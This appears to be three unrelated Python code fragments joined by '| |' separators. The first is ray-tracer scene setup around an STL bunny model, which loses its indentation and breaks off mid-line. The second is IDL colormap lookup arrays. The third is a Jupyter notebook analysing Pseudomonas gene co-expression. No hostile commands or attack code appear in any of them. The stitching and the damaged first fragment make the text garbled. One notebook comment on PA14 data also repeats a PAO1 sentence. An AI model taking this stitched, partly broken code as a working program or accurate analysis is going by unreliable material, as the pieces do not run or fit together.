    v1 = Vec3(-plane_x, plane_y, back_plane_z)
    uv1 = (0, 1)
    v2 = Vec3(plane_x, plane_y, front_plane_z)
    uv2 = (1, 0)
    v3 = Vec3(plane_x, plane_y, back_plane_z)
    uv3 = (1, 1)
    world.add(Triangle(v0, v1, v2, ground_matl, uv0, uv1, uv2))
    world.add(Triangle(v1, v2, v3, ground_matl, uv1, uv2, uv3))

    # Lighting: disc area light overhead; a PointLight alternative is kept
    # for experiments.
    ambient = Vec3(0.6, 0.6, 0.6)
    background = SolidColor(Vec3(0.5, 0.7, 1.0))
    geom = Disc(center=Vec3(3, 10, -3), normal=Vec3(0, -1, 0), radius=1.5, material=SolidColor(Vec3(0.7, 0.7, 0.7)))
    if settings and 'SAMPLES_PER_LIGHT' in settings:
        samples = settings['SAMPLES_PER_LIGHT']
    else:
        samples = 25
    # light_1 = PointLight(pos=Vec3(-10.0, 100, 80), color=Vec3(0.6, 0.6, 0.6))
    light_2 = AreaLight(geom=geom, color=Vec3(0.6, 0.6, 0.6), num_samples=samples)
    lights = [light_2]
    scene = Scene(world, ambient=ambient, lights=lights, background=background)
    camera = Camera(look_from=scene_config['look_from'], look_at=scene_config['look_at'], vup=Vec3(0, 1, 0), vert_fov=25)
    return {'scene': scene, 'camera': camera}
def create_stl_mesh(settings=None):
"""
TODO:
scale the model
"""
silver = SolidColor(Vec3(0.7, 0.7, 0.7))
green = SolidColor(Vec3(0.1, 0.5, 0.1))
blue = SolidColor(Vec3(0.1, 0.1, 0.5))
red = SolidColor(Vec3(0.5, 0.2, 0.2))
purple = SolidColor(Vec3(0.4, 0.1, 0.4))
gray = SolidColor(Vec3(0.2, 0.2, 0.2))
med_gray = SolidColor(Vec3(0.4, 0.4, 0.4))
light_gray = SolidColor(Vec3(0.9, 0.9, 0.9))
dark_gray = SolidColor(Vec3(0.1, 0.1, 0.1))
black = SolidColor(Vec3(0.0, 0.0, 0.0))
# rotated by 90 deg on the X axis... bbox=AABB(vmin=(-48.551, 5.275, -45.792), vmax=(59.196, 113.167, 42.010)), num_triangles=112402
stl_filename = "models/Bunny.stl"
settings = {'look_from': Vec3(0.0, 100, 350), 'look_at': Vec3(0, 50.0, 0),
'plane_x': 120, 'plane_y': 5.275, 'back_plane_z': -85, 'front_plane_z': 350,
'rot_axis': [1,0,0], 'rot_rads': math.pi/2, 'translate': [-25, 0, 0], 'show_walls': True}
image_2 = Image.open(Path("./textures/IO_logo.png"))
logo = ImageTexture(image_2) # images are across the entire checkerboard, not a single square?
checked = CheckerBoard(dark_gray, light_gray, spacing=0.1)
diffuse_red = Lambertian(red, name="red'")
diffuse_blue = Lambertian(blue, name="blue'")
diffuse_gray = Lambertian(gray, name="gray'")
diffuse_med_gray = Lambertian(med_gray, name="med_gray'")
diffuse_light_gray = Lambertian(light_gray, name="light_gray'")
metal_1 = Metal(silver, name="metal_1")
logo_matl = Lambertian(logo, name="logo")
# dielectric_1 = Dielectric(1.5, name="dielectric_1")
checkerboard = Lambertian(checked, name="gray'")
dielectric = Dielectric(1.0, "dielectric")
# object_matl = metal_1
# object_matl = diffuse_gray
object_matl = diffuse_light_gray
# object_matl = dielectric
ground_matl = diffuse_gray
# ground_matl = checkerboard
# ground_matl = logo_matl
# right_wall_matl = diffuse_red
# right_wall_matl = metal_1
right_wall_matl = diffuse_light_gray
# left_wall_matl = diffuse_blue
# left_wall_matl = metal_1
left_wall_matl = diffuse_light_gray
# back_wall_matl = logo_matl
# back_wall_matl = metal_1
back_wall_matl = checkerboard
world = GeometryList()
if True:
plane_x = settings['plane_x']
plane_y = settings['plane_y']
back_plane_z = settings['back_plane_z']
front_plane_z = settings['front_plane_z']
if True:
# ground plane
v0 = Vec3(-plane_x, plane_y, front_plane_z)
uv0 = (0,1)
v1 = Vec3(-plane_x ,plane_y,back_plane_z)
uv1 = (0,0)
v2 = Vec3(plane_x, plane_y, front_plane_z)
uv2 = (1,1)
v3 = Vec3(plane_x, plane_y,back_plane_z)
uv3 = (1,0)
triangle = Triangle(v0, v1, v2, ground_matl, uv0, uv1, uv2)
world.add(triangle)
triangle = Triangle(v1, v2, v3, ground_matl, uv1, uv2, uv3)
world.add(triangle)
height = 2 * plane_x
if settings['show_walls'] is True:
# right wall
v0 = Vec3(plane_x, plane_y, front_plane_z)
uv0 = (1, 1)
v1 = Vec3(plane_x, plane_y, back_plane_z)
uv1 = (0, 1)
v2 = Vec3(plane_x, plane_y+height, back_plane_z)
uv2 = (0,0)
v3 = Vec3(plane_x, plane_y+height, front_plane_z)
uv3 = (1, 0)
triangle = Triangle(v0, v1, v2, right_wall_matl, uv0, uv1, uv2)
world.add(triangle)
triangle = Triangle(v0, v2, v3, right_wall_matl, uv0, uv2, uv3)
world.add(triangle)
# left wall
v0 | |
1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0]),
)
### IDL colormap 35 :: Blue Waves ###
color_map_luts['idl35'] = \
(
array([ 0.3203125, 0.3203125, 0.3007812, 0.2851562, 0.2656250, 0.2460938,
0.2304688, 0.2109375, 0.1953125, 0.1796875, 0.1640625, 0.1484375,
0.1328125, 0.1171875, 0.1015625, 0.0898438, 0.0742188, 0.0625000,
0.0507812, 0.0507812, 0.0312500, 0.0195312, 0.0117188, 0.0039062,
0.0000000, 0.0078125, 0.0117188, 0.0195312, 0.0234375, 0.0234375,
0.0273438, 0.0273438, 0.0312500, 0.0273438, 0.0273438, 0.0234375,
0.0234375, 0.0195312, 0.0117188, 0.0078125, 0.0000000, 0.0039062,
0.0117188, 0.0195312, 0.0312500, 0.0507812, 0.0507812, 0.0625000,
0.0742188, 0.0898438, 0.1015625, 0.1171875, 0.1328125, 0.1484375,
0.1640625, 0.1796875, 0.1953125, 0.2109375, 0.2304688, 0.2460938,
0.2656250, 0.2851562, 0.3007812, 0.3203125, 0.3398438, 0.3554688,
0.3750000, 0.3906250, 0.4101562, 0.4296875, 0.4453125, 0.4648438,
0.4804688, 0.4960938, 0.5117188, 0.5273438, 0.5429688, 0.5585938,
0.5742188, 0.5859375, 0.6015625, 0.6132812, 0.6250000, 0.6367188,
0.6445312, 0.6562500, 0.6640625, 0.6718750, 0.6796875, 0.6875000,
0.6914062, 0.6992188, 0.7031250, 0.7031250, 0.7070312, 0.7070312,
0.7109375, 0.7070312, 0.7070312, 0.7031250, 0.7031250, 0.6992188,
0.6914062, 0.6875000, 0.6796875, 0.6718750, 0.6640625, 0.6562500,
0.6445312, 0.6367188, 0.6250000, 0.6132812, 0.6015625, 0.5859375,
0.5742188, 0.5585938, 0.5429688, 0.5273438, 0.5117188, 0.4960938,
0.4804688, 0.4648438, 0.4453125, 0.4296875, 0.4101562, 0.3906250,
0.3750000, 0.3554688, 0.3359375, 0.3203125, 0.3007812, 0.2851562,
0.2656250, 0.2460938, 0.2304688, 0.2109375, 0.1953125, 0.1796875,
0.1640625, 0.1484375, 0.1328125, 0.1171875, 0.1015625, 0.0898438,
0.0742188, 0.0625000, 0.0507812, 0.0507812, 0.0312500, 0.0195312,
0.0117188, 0.0039062, 0.0000000, 0.0078125, 0.0117188, 0.0195312,
0.0234375, 0.0234375, 0.0273438, 0.0273438, 0.0312500, 0.0273438,
0.0273438, 0.0234375, 0.0234375, 0.0195312, 0.0117188, 0.0078125,
0.0000000, 0.0039062, 0.0117188, 0.0195312, 0.0312500, 0.0507812,
0.0507812, 0.0625000, 0.0742188, 0.0898438, 0.1015625, 0.1171875,
0.1328125, 0.1484375, 0.1640625, 0.1796875, 0.1953125, 0.2109375,
0.2304688, 0.2460938, 0.2656250, 0.2851562, 0.3007812, 0.3203125,
0.3398438, 0.3554688, 0.3750000, 0.3906250, 0.4101562, 0.4296875,
0.4453125, 0.4648438, 0.4804688, 0.4960938, 0.5117188, 0.5273438,
0.5429688, 0.5585938, 0.5742188, 0.5859375, 0.6015625, 0.6132812,
0.6250000, 0.6367188, 0.6445312, 0.6562500, 0.6640625, 0.6718750,
0.6796875, 0.6875000, 0.6914062, 0.6992188, 0.7031250, 0.7031250,
0.7070312, 0.7070312, 0.7109375, 0.7070312, 0.7070312, 0.7031250,
0.7031250, 0.6992188, 0.6914062, 0.6875000, 0.6796875, 0.6718750,
0.6640625, 0.6562500, 0.6445312, 0.6367188, 0.6250000, 0.6132812,
0.6015625, 0.5859375, 0.5742188, 0.5585938, 0.5429688, 0.5273438,
0.5117188, 0.4960938, 0.4804688, 0.4648438, 0.4453125, 0.4296875,
0.4101562, 0.3906250, 0.3750000, 0.3750000]),
array([ 0.0000000, 0.0000000, 0.0039062, 0.0039062, 0.0078125, 0.0078125,
0.0117188, 0.0156250, 0.0156250, 0.0195312, 0.0234375, 0.0234375,
0.0273438, 0.0312500, 0.0351562, 0.0507812, 0.0429688, 0.0468750,
0.0507812, 0.0585938, 0.0625000, 0.0664062, 0.0742188, 0.0781250,
0.0859375, 0.0898438, 0.0976562, 0.1054688, 0.1093750, 0.1171875,
0.1250000, 0.1328125, 0.1367188, 0.1445312, 0.1523438, 0.1601562,
0.1679688, 0.1757812, 0.1796875, 0.1875000, 0.1953125, 0.1992188,
0.2070312, 0.2148438, 0.2187500, 0.2265625, 0.2304688, 0.2343750,
0.2382812, 0.2421875, 0.2460938, 0.2500000, 0.2539062, 0.2578125,
0.2578125, 0.2617188, 0.2617188, 0.2617188, 0.2617188, 0.2617188,
0.2617188, 0.2617188, 0.2617188, 0.2578125, 0.2578125, 0.2539062,
0.2500000, 0.2500000, 0.2460938, 0.2421875, 0.2382812, 0.2343750,
0.2304688, 0.2226562, 0.2187500, 0.2148438, 0.2109375, 0.2070312,
0.2031250, 0.1992188, 0.1914062, 0.1875000, 0.1835938, 0.1835938,
0.1796875, 0.1757812, 0.1718750, 0.1718750, 0.1718750, 0.1679688,
0.1679688, 0.1679688, 0.1679688, 0.1718750, 0.1718750, 0.1757812,
0.1796875, 0.1835938, 0.1875000, 0.1953125, 0.1992188, 0.2070312,
0.2148438, 0.2226562, 0.2343750, 0.2421875, 0.2539062, 0.2656250,
0.2773438, 0.2890625, 0.3046875, 0.3164062, 0.3320312, 0.3437500,
0.3593750, 0.3750000, 0.3906250, 0.4062500, 0.4218750, 0.4375000,
0.4531250, 0.4687500, 0.4843750, 0.5000000, 0.5156250, 0.5312500,
0.5468750, 0.5625000, 0.5781250, 0.5898438, 0.6015625, 0.6171875,
0.6289062, 0.6406250, 0.6484375, 0.6601562, 0.6679688, 0.6757812,
0.6835938, 0.6875000, 0.6953125, 0.6992188, 0.7031250, 0.7031250,
0.7031250, 0.7031250, 0.7031250, 0.6992188, 0.6992188, 0.6953125,
0.6875000, 0.6835938, 0.6757812, 0.6679688, 0.6601562, 0.6484375,
0.6406250, 0.6289062, 0.6171875, 0.6054688, 0.5937500, 0.5781250,
0.5664062, 0.5507812, 0.5390625, 0.5234375, 0.5117188, 0.4960938,
0.4843750, 0.4687500, 0.4570312, 0.4414062, 0.4296875, 0.4179688,
0.4062500, 0.3945312, 0.3867188, 0.3789062, 0.3710938, 0.3632812,
0.3554688, 0.3515625, 0.3476562, 0.3437500, 0.3437500, 0.3437500,
0.3437500, 0.3437500, 0.3476562, 0.3554688, 0.3593750, 0.3671875,
0.3750000, 0.3867188, 0.3984375, 0.4101562, 0.4257812, 0.4414062,
0.4570312, 0.4765625, 0.4960938, 0.5156250, 0.5351562, 0.5546875,
0.5781250, 0.6015625, 0.6250000, 0.6484375, 0.6757812, 0.6992188,
0.7265625, 0.7500000, 0.7773438, 0.8007812, 0.8281250, 0.8515625,
0.8789062, 0.9023438, 0.9257812, 0.9492188, 0.9687500, 0.9921875,
0.9804688, 0.9609375, 0.9414062, 0.9257812, 0.9101562, 0.8945312,
0.8828125, 0.8710938, 0.8593750, 0.8515625, 0.8437500, 0.8398438,
0.8359375, 0.8320312, 0.8320312, 0.8359375, 0.8359375, 0.8437500,
0.8476562, 0.8554688, 0.8671875, 0.8750000, 0.8906250, 0.9023438,
0.9179688, 0.9335938, 0.9531250, 0.9687500, 0.9882812, 0.9804688,
0.9609375, 0.9375000, 0.9140625, 0.9140625]),
array([ 0.8359375, 0.8359375, 0.7890625, 0.7382812, 0.6914062, 0.6445312,
0.5976562, 0.5507812, 0.5039062, 0.4609375, 0.4179688, 0.3750000,
0.3320312, 0.2929688, 0.2539062, 0.2187500, 0.1835938, 0.1484375,
0.1171875, 0.0859375, 0.0585938, 0.0351562, 0.0078125, 0.0078125,
0.0273438, 0.0468750, 0.0625000, 0.0742188, 0.0859375, 0.0937500,
0.0976562, 0.1015625, 0.1054688, 0.1015625, 0.0976562, 0.0937500,
0.0859375, 0.0742188, 0.0625000, 0.0468750, 0.0273438, 0.0078125,
0.0078125, 0.0351562, 0.0585938, 0.0859375, 0.1171875, 0.1484375,
0.1835938, 0.2187500, 0.2539062, 0.2929688, 0.3320312, 0.3750000,
0.4179688, 0.4609375, 0.5039062, 0.5507812, 0.5976562, 0.6445312,
0.6914062, 0.7382812, 0.7890625, 0.8359375, 0.8867188, 0.9335938,
0.9804688, 0.9609375, 0.9140625, 0.8671875, 0.8203125, 0.7734375,
0.7265625, 0.6835938, 0.6406250, 0.5976562, 0.5546875, 0.5156250,
0.4765625, 0.4414062, 0.4062500, 0.3710938, 0.3398438, 0.3085938,
0.2812500, 0.2578125, 0.2304688, 0.2109375, 0.1914062, 0.1718750,
0.1562500, 0.1445312, 0.1328125, 0.1250000, 0.1210938, 0.1171875,
0.1132812, 0.1171875, 0.1210938, 0.1250000, 0.1328125, 0.1445312,
0.1562500, 0.1718750, 0.1914062, 0.2109375, 0.2304688, 0.2578125,
0.2812500, 0.3085938, 0.3398438, 0.3710938, 0.4062500, 0.4414062,
0.4765625, 0.5156250, 0.5546875, 0.5976562, 0.6406250, 0.6835938,
0.7265625, 0.7734375, 0.8203125, 0.8671875, 0.9140625, 0.9609375,
0.9804688, 0.9335938, 0.8828125, 0.8359375, 0.7890625, 0.7382812,
0.6914062, 0.6445312, 0.5976562, 0.5507812, 0.5039062, 0.4609375,
0.4179688, 0.3750000, 0.3320312, 0.2929688, 0.2539062, 0.2187500,
0.1835938, 0.1484375, 0.1171875, 0.0859375, 0.0585938, 0.0351562,
0.0078125, 0.0078125, 0.0273438, 0.0468750, 0.0625000, 0.0742188,
0.0859375, 0.0937500, 0.0976562, 0.1015625, 0.1054688, 0.1015625,
0.0976562, 0.0937500, 0.0859375, 0.0742188, 0.0625000, 0.0468750,
0.0273438, 0.0078125, 0.0078125, 0.0351562, 0.0585938, 0.0859375,
0.1171875, 0.1484375, 0.1835938, 0.2187500, 0.2539062, 0.2929688,
0.3320312, 0.3750000, 0.4179688, 0.4609375, 0.5039062, 0.5507812,
0.5976562, 0.6445312, 0.6914062, 0.7382812, 0.7890625, 0.8359375,
0.8867188, 0.9335938, 0.9804688, 0.9609375, 0.9140625, 0.8671875,
0.8203125, 0.7734375, 0.7265625, 0.6835938, 0.6406250, 0.5976562,
0.5546875, 0.5156250, 0.4765625, 0.4414062, 0.4062500, 0.3710938,
0.3398438, 0.3085938, 0.2812500, 0.2578125, 0.2304688, 0.2109375,
0.1914062, 0.1718750, 0.1562500, 0.1445312, 0.1328125, 0.1250000,
0.1210938, 0.1171875, 0.1132812, 0.1171875, 0.1210938, 0.1250000,
0.1328125, 0.1445312, 0.1562500, 0.1718750, 0.1914062, 0.2109375,
0.2304688, 0.2578125, 0.2812500, 0.3085938, 0.3398438, 0.3710938,
0.4062500, 0.4414062, 0.4765625, 0.5156250, 0.5546875, 0.5976562,
0.6406250, 0.6835938, 0.7265625, 0.7734375, 0.8203125, 0.8671875,
0.9140625, 0.9609375, 0.9804688, 0.9804688]),
array([ 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0]),
)
### IDL colormap 36 :: Volcano ###
color_map_luts['idl36'] = \
(
array([ 0.2500000, 0.2500000, 0.2343750, 0.2226562, 0.2109375, 0.1992188,
0.1875000, 0.1757812, 0.1640625, 0.1562500, 0.1445312, 0.1367188,
0.1250000, 0.1171875, | |
# coding: utf-8
# # Explore highly co-expressed genes
# In the previous [notebook](2_explore_corr_of_genes.ipynb) we observed that using 39 samples with 201 PAO1-specific genes, that the correlation of accessory-accessory genes is higher compared to the correlation of core-core and core-accessory genes.
#
# Based on this finding, we want to know: *What can explain this difference in correlation distribution?*
#
# This notebook performs a follow-up analysis. In particular this notebook performs a deeper examination of the correlation structure per group (core-core, core-accessory, accessory-accessory) by looking at the trends of the nearest neighbors (i.e. highly correlated genes) of each gene.
# In[74]:
import pandas as pd
import os
import pickle
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from functions import calculations
np.random.seed(123)
# In[75]:
# Input
base_dir = os.path.abspath(os.path.join(os.getcwd(), "../"))
base_intermediate_dir = os.path.join(
    base_dir,
    "pilot_experiment",
    "data",
    "tmp")
core_gene_ids_file = os.path.join(
    base_intermediate_dir,
    "core_gene_ids.pickle")
acc_gene_ids_file = os.path.join(
    base_intermediate_dir,
    "acc_gene_ids.pickle")
real_all_corr_file = os.path.join(
    base_intermediate_dir,
    "real_all_corr.pickle")
shuffled_all_corr_file = os.path.join(
    base_intermediate_dir,
    "shuffled_all_corr.pickle")
# Import Pseudomonas operon annotations from ADAGE repo
# Original source of data is from DOOR
# Operons containing at least 3 genes
# NOTE: use the raw.githubusercontent.com URL -- the former
# github.com/.../blob/... URL serves the rendered HTML page for the file,
# not the tab-delimited operon data itself.
operon_file = "https://raw.githubusercontent.com/greenelab/adage/master/Genome_organization/operon_3.txt"
# In[76]:
# Read in gene ids
# Use context managers so the pickle file handles are closed promptly;
# the previous `pickle.load(open(...))` form leaked the handles.
with open(core_gene_ids_file, "rb") as fh:
    core_gene_ids = pickle.load(fh)
with open(acc_gene_ids_file, "rb") as fh:
    acc_gene_ids = pickle.load(fh)
# Get number of core and accessory genes
num_core_genes = len(core_gene_ids)
num_acc_genes = len(acc_gene_ids)
num_all_genes = num_core_genes + num_acc_genes
# # Extract statistics about co-expression from correlation matrix
# In[77]:
# Define threshold for highly co-expressed genes
coexpression_threshold = 0.9
# ### Co-expression statistics using real data
# In[78]:
# Get co-expression patterns using real expression data
# (per-gene co-expression statistics for core and accessory genes, derived
# from the gene-gene correlation matrix at the chosen threshold)
real_core_df, real_acc_df = calculations.get_coexpression_stats(real_all_corr_file,
                                                                operon_file,
                                                                core_gene_ids_file,
                                                                acc_gene_ids_file,
                                                                coexpression_threshold)
# In[79]:
real_core_df.head()
# In[80]:
real_acc_df.head()
# ### Co-expression statistics using shuffled data
# In[81]:
# Get co-expression patterns using shuffled expression data (control)
shuffled_core_df, shuffled_acc_df = calculations.get_coexpression_stats(shuffled_all_corr_file,
                                                                        operon_file,
                                                                        core_gene_ids_file,
                                                                        acc_gene_ids_file,
                                                                        coexpression_threshold)
shuffled_core_df.head()
# In[82]:
shuffled_acc_df.head()
# # Plot trends in co-expression data
# ## 1. Number of co-expressed genes
# In[83]:
sns.set()
# ### Number of co-expressed genes
# In[84]:
# Get bins using all data
# (shared bin edges so the core and accessory panels are directly comparable)
hist, bins_num_coexpressed_real = np.histogram(np.concatenate([real_core_df['num_coexpressed_genes'].values,
                                                               real_acc_df['num_coexpressed_genes'].values]))
# Distribution of number of co-expressed genes in real data
# Set up the matplotlib figure
fig, axes = plt.subplots(ncols=2, nrows=1)
sns.distplot(real_core_df['num_coexpressed_genes'].tolist(),
             label='core',
             color='red',
             kde=False,
             bins=bins_num_coexpressed_real,
             ax=axes[0])
sns.distplot(real_acc_df['num_coexpressed_genes'].tolist(),
             label='accessory',
             color='blue',
             kde=False,
             bins=bins_num_coexpressed_real,
             ax=axes[1])
plt.suptitle('Number of co-expressed genes (real data, threshold={})'.format(coexpression_threshold))
axes[0].legend(prop={'size': 12})
axes[1].legend(prop={'size': 12})
fig.text(0.5, 0.01, 'Number of co-expressed genes', ha='center')
axes[0].set_ylabel('Counts')
# ### Number of nonzero co-expressed genes
# In[85]:
## Remove genes with 0 co-expressed genes
# Get bins using all data
hist, bins_num_coexpressed_real_nonzero = np.histogram(np.concatenate(
    [real_core_df[real_core_df['num_coexpressed_genes']>0]['num_coexpressed_genes'].values,
     real_acc_df[real_acc_df['num_coexpressed_genes']>0]['num_coexpressed_genes'].values]))
# Set up the matplotlib figure
fig, axes = plt.subplots(ncols=2, nrows=1)
# Distribution of number of co-expressed genes in real data
sns.distplot(real_core_df[real_core_df['num_coexpressed_genes']>0]['num_coexpressed_genes'].tolist(),
             label='core',
             color='red',
             kde=False,
             bins=bins_num_coexpressed_real_nonzero,
             ax=axes[0])
sns.distplot(real_acc_df[real_acc_df['num_coexpressed_genes']>0]['num_coexpressed_genes'].tolist(),
             label='accessory',
             color='blue',
             kde=False,
             bins=bins_num_coexpressed_real_nonzero,
             ax=axes[1])
plt.suptitle('Number of nonzero co-expressed genes (real data, threshold={})'.format(coexpression_threshold))
axes[0].legend(prop={'size': 12})
axes[1].legend(prop={'size': 12})
fig.text(0.5, 0.01, 'Number of co-expressed genes', ha='center')
axes[0].set_ylabel('Counts')
# In[86]:
# Get bins using all data
hist, bins_num_coexpressed_shuffled = np.histogram(np.concatenate([shuffled_core_df['num_coexpressed_genes'].values,
                                                                   shuffled_acc_df['num_coexpressed_genes'].values]))
# Set up the matplotlib figure
fig, axes = plt.subplots(ncols=2, nrows=1)
# Distribution of number of co-expressed genes in shuffled data
sns.distplot(shuffled_core_df['num_coexpressed_genes'].tolist(),
             label='core',
             color='red',
             kde=False,
             bins=bins_num_coexpressed_shuffled,
             ax=axes[0])
sns.distplot(shuffled_acc_df['num_coexpressed_genes'].tolist(),
             label='accessory',
             color='blue',
             kde=False,
             bins=bins_num_coexpressed_shuffled,
             ax=axes[1]
             )
plt.suptitle('Number of co-expressed genes (shuffled data, threshold={})'.format(coexpression_threshold))
axes[0].legend(prop={'size': 12})
axes[1].legend(prop={'size': 12})
fig.text(0.5, 0.01, 'Number of co-expressed genes', ha='center')
axes[0].set_ylabel('Counts')
# In[87]:
# Report the median number of co-expressed partners per gene, split by
# core vs accessory and by real vs shuffled (control) data.
print(f'Using a threshold of {coexpression_threshold} to define co-expression (real data): \n')
print(f"- For a given CORE gene, there is a median of {np.median(real_core_df['num_coexpressed_genes'])} co-expressed genes")
print(f"- For a given ACCESSORY gene, there is a median of {np.median(real_acc_df['num_coexpressed_genes'])} co-expressed genes \n")
# For shuffled data
print(f'Using a threshold of {coexpression_threshold} to define co-expression (shuffled data): \n')
print(f"- For a given CORE gene, there is a median of {np.median(shuffled_core_df['num_coexpressed_genes'])} co-expressed genes")
print(f"- For a given ACCESSORY gene, there is a median of {np.median(shuffled_acc_df['num_coexpressed_genes'])} co-expressed genes")
# **Overall:**
# * Many core and accessory genes are not co-expressed with other genes or very few genes, as expected
# * As increase threshold (more stringent), there are fewer co-expressed genes, as expected
# * (control, not shown) All genes (threshold=0.75,0.9) are connected to just 1 gene, as expected, since we have destroyed relationships between genes when we shuffled
# * Both core and accessory genes have the same degree of connectivity
#
# **Observation using All experiments:**
# * At a threshold of 0.5, core genes have a median of 716 genes they are connect to and accessory genes have a median of 601 genes they are connected to
# * At a threshold of 0.75 core genes have a median of 53 genes they are connect to and accessory genes have a median of 74 genes they are connected to
# * At a threshold of 0.9, core and accessory genes have a median of 1 gene that they are connected to
#
# **Observation using only PAO1 experiments:**
# * At a threshold of 0.5, core genes have a median of 1331 genes they are connect to and accessory genes have a median of 1341 genes they are connected to. So there are more connections using only PAO1 genes, which we would expect since the accessory genes are PAO1-specific.
# * At a threshold of 0.75 core genes have a median of 554 genes they are connect to and accessory genes have a median of 576 genes they are connected to
# * At a threshold of 0.9, core genes have a median of 21 gene that they are connected to and accessory genes have a median of 57 genes they are connected to
#
# **Observation using only PA14 experiments:**
# * At a threshold of 0.5, core genes have a median of 1133 genes they are connect to and accessory genes have a median of 1065 genes they are connected to. So there are more connections using only PAO1 genes, which we would expect since the accessory genes are PAO1-specific.
# * At a threshold of 0.75 core genes have a median of 153 genes they are connect to and accessory genes have a median of 132 genes they are connected to
# * At a threshold of 0.9, core genes have a median of 2 gene that they are connected to and accessory genes have a median of 3 genes they are connected to
# ### Compare co-expressed vs not co-expressed genes
# What is the difference between genes that are co-expressed vs those that are not?
# In[15]:
# Get genes that are co-expressed with other genes
# (i.e. genes with at least one partner above the correlation threshold)
coexpressed_core_genes = list(real_core_df[real_core_df['num_coexpressed_genes']>0].index)
coexpressed_acc_genes = list(real_acc_df[real_acc_df['num_coexpressed_genes']>0].index)
# In[16]:
# Bare expressions below are notebook cell outputs (counts of genes kept).
len(coexpressed_core_genes)
# In[17]:
len(coexpressed_acc_genes)
# At a strict threshold of 0.9, all genes are co-expressed with **at least** one other gene. So there are no independent genes.
# ## 2. Percent of co-expressed genes that are NOT in the same operon
# In[15]:
# Calculate the percent of co-expressed genes that are non co-operonic (real data)
real_percent_non_cooperonic_coexpressed_core_genes = (
    real_core_df['num_non_cooperonic_coexpressed_genes']/real_core_df['num_coexpressed_genes'])
real_percent_non_cooperonic_coexpressed_acc_genes = (
    real_acc_df['num_non_cooperonic_coexpressed_genes']/real_acc_df['num_coexpressed_genes'])
